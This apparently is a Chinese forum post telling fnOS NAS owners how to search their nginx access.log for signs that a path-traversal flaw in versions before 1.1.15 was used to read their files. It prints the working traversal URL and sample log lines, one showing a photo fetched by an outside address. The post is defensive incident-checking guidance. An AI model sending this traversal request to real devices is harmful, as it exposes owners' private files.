请不要把任何和邀请码有关的内容发到 NAS 节点。
邀请码相关的内容请使用 /go/in 节点。
如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
邀请码相关的内容请使用 /go/in 节点。
如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
在开始之前,请先确认,是否升级到 1.1.18 系统,如果升级了系统,会导致 access.log 文件被覆盖,无法查询,忽略此方法
fnOS 的 nginx 日志在/usr/trim/nginx/logs/access.log
1.1.15 之前版本,查看路径,http://ip:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../usr/trim/nginx/logs/access.log
查看:access.log,搜索关键字:app-center-static/serviceicon/myapp
如果出现 192.168.15.111 - - [01/Feb/2026:22:43:30 +0800] "GET /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../ HTTP/1.1" 404
说明访问遇到了 404 ,漏洞已被修改,不用担心
如果出现 180.000.000.236 - - [02/Feb/2026:16:48:53 +0800] "GET /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol2/1000/Photos/%E9%9D%99%E5%A9%A7/IMG_20180209_125335.jpg HTTP/1.1" 200 84235
那就中奖了,解析 180.000.000.236 在 02 日/2 月/2026 年 16:48:53 访问了/vol2/1000/Photos/%E9%9D%99%E5%A9%A7/IMG_20180209_125335.jpg 文件 一次类推,可以了解到自己哪些文件已泄露,做好排查工作。
目前尚无回复
Select Language